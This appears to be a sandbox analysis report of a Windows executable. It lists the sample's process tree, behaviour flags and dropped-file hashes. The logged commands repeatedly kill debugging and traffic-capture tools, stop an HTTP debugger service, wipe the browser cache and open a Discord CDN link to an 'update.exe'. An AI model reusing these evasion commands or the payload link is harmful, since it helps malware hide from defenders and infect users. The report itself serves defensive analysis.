C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T3⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /IM HTTPDebuggerSvc.exe /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\K4F80D1AI28Y.exe" MD5 | find /i /v "md5" | find /i /v "certutil"2⤵
-
C:\Windows\system32\certutil.execertutil -hashfile "C:\Users\Admin\AppData\Local\Temp\K4F80D1AI28Y.exe" MD53⤵
- Loads dropped DLL
-
C:\Windows\system32\find.exefind /i /v "certutil"3⤵
-
C:\Windows\system32\find.exefind /i /v "md5"3⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&12⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&12⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /IM HTTPDebuggerSvc.exe /F3⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T3⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T3⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&12⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /IM HTTPDebuggerSvc.exe /F3⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/920160935023362120/1016575229683834940/update.exe2⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffbeb9746f8,0x7ffbeb974708,0x7ffbeb9747183⤵
-
C:\Users\Admin\Downloads\J0BK7JPSO0QL.exe"C:\Users\Admin\Downloads\J0BK7JPSO0QL.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: RenamesItself
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\Downloads\J0BK7JPSO0QL.exe" MD5 | find /i /v "md5" | find /i /v "certutil"2⤵
-
C:\Windows\system32\certutil.execertutil -hashfile "C:\Users\Admin\Downloads\J0BK7JPSO0QL.exe" MD53⤵
- Loads dropped DLL
-
C:\Windows\system32\find.exefind /i /v "certutil"3⤵
-
C:\Windows\system32\find.exefind /i /v "md5"3⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&12⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /IM HTTPDebuggerSvc.exe /F3⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T3⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&12⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /IM HTTPDebuggerSvc.exe /F3⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&12⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /IM HTTPDebuggerSvc.exe /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/920160935023362120/1016575229683834940/update.exe2⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffbeb9746f8,0x7ffbeb974708,0x7ffbeb9747183⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\6498.2022.8.1\manifest.fingerprintFilesize
66B
MD5df6d3c65ee273b748beb53aecb7f979c
SHA18e48bcc7c483c672fe4c6b6fd373d4c69dd9b152
SHA256e07d33054ff7ba6e5e27a21f314a772bd616cd856a242b24c6f08a41df1fcf82
SHA5128ad62912d1baf95ce7b8bc16f7fce3533473e54d2bb804f786be62387c0af407640b24e7510d77e476daeede69b6d6ef4708f43c81a8dd99a5a06bbc47180886
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\6498.2022.8.1\manifest.jsonFilesize
113B
MD5a10686bb3ebc4154802435e02e63566e
SHA12c2ceca7de17afe8158aa6871cf478d626bf2567
SHA256e4f9de4706ae0bf6e2337a809a74e20af126936e992d58a8ef11cad83f1e8bfd
SHA512aa39d19dffc9e85323378578c314fddca140971c0a0f0322f55b8c672397794413073bd5271fa3656a04a73aee90ae8e8aae5eae69d457dd1ccc46707c88f245
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5962644599f0c746e1b17a064c670d314
SHA173ccfa471325f9fe38767edab76fa81e95565eed
SHA25612a158f591771e7f38f053f1313393c645faa7f295dc9f6585ebca642b9e1966
SHA512cd0cbce39701693991473c1d6b8fbbe63123cbad26f5f745fcc2e0eab2db17926a577b0bc72b7d84a9cbc976112a054a5f071c5fafd6e38c32facba28d79c4cb
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
1KB
MD56f68dcae6f4a541f555228c3f00d41d9
SHA18538053657ae58f190cde71d29e3da5177bbde61
SHA2567db741e4af2e6646a5051c86e792f2cacfa3a9d5c363359b2d7bddba735f8ae4
SHA5127d50ed9f59a2dc71ecd6a264ea4a36eca3c89573aa1df712ea02b032ccc41eedfc347ae82938e697fb569eb328bc10f54012c221737aec1d52a5f13a66325cda
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir\the-real-indexFilesize
48B
MD5fd7d226c73b452c8cf1a42821b72f42f
SHA10ec7eac283298450745c678761fd1e8f6a179f0c
SHA2561c2466a3be9fac8686e594b12eb98264459d5f998c2febecf9dc9d4317e78ecc
SHA5120902ca6ea350b2f8b89cd0c15d64601fc26c350c2fd00e79f3ccd923d44f8880a61953152bc617a06d12bce9d4ed2a4c47221a3c3832d4041c628b5abceb35e4
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\CookiesFilesize
20KB
MD51062e3bde5a46f8ef16c1123566f4aa9
